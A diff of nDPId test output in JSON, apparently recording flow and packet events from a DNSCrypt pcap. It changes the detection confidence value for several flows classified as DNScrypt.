AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":266,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312402} 
00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":266,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAABQ7t4Aub0RDUQKAAABXV\/ipQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAXc7t8gAL0R6G8KAAABXV\/ipeMBAbsGBB2Gx+sBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAIc7uBAAL0RzC4KAAABXV\/ipaSsAbsCCALbx+oBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":269,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312402} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":269,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAABQ7t8Aub0RDUMKAAABXV\/ipQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAIc7uFAAL0RzC0KAAABXV\/ipeY4AbsCCALbx+gBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAXc7uIgAL0R6GwKAAABXV\/ipZ6TAbsGBGH4x+cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":272,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312402} 
00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":272,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAABQ7uIAub0RDUAKAAABXV\/ipQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":946739312405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312405,"pkt":"ZmZmZmZmRERERERECABFAADUFOtAADYRDapCVR5zCgAAAQG7nKMAwIXDLCqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADd8l9MieIsifjQGavIzw6tdHygby+pfz9uNV\/2so9cMC7hGKDfc+LzmB07CCRnhhWiHEKH9gFPecA8dSkDUDQHbk9p0e06j3wfoDIfK8NHA0t38M\/xpcLwZlzH2416A0JuT2nR7TqPfAAAAAFfU1T+X1Smfg=="} 
@@ -554,26 +554,26 @@ 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":946739312466,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739312466,"pkt":"ZmZmZmZmRERERERECABFAADTA\/UAADYRf2RdX+KlCgAAAQG75jgAv7Apx+iBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAEQUmbKEod9nlyKPPrQqGP9Ls8t6H\/YHI72RThtMayAXvqOxd6z058i8UJ7+KMLpc+YgjKuAGDN2+1oeB3OFIgnw9LuNjyX7NTXMUO6Dulhi3d3ExK4wLeAsg632WDfaPfD0u42PJfs1X1OugV9TroFfVQAB"} 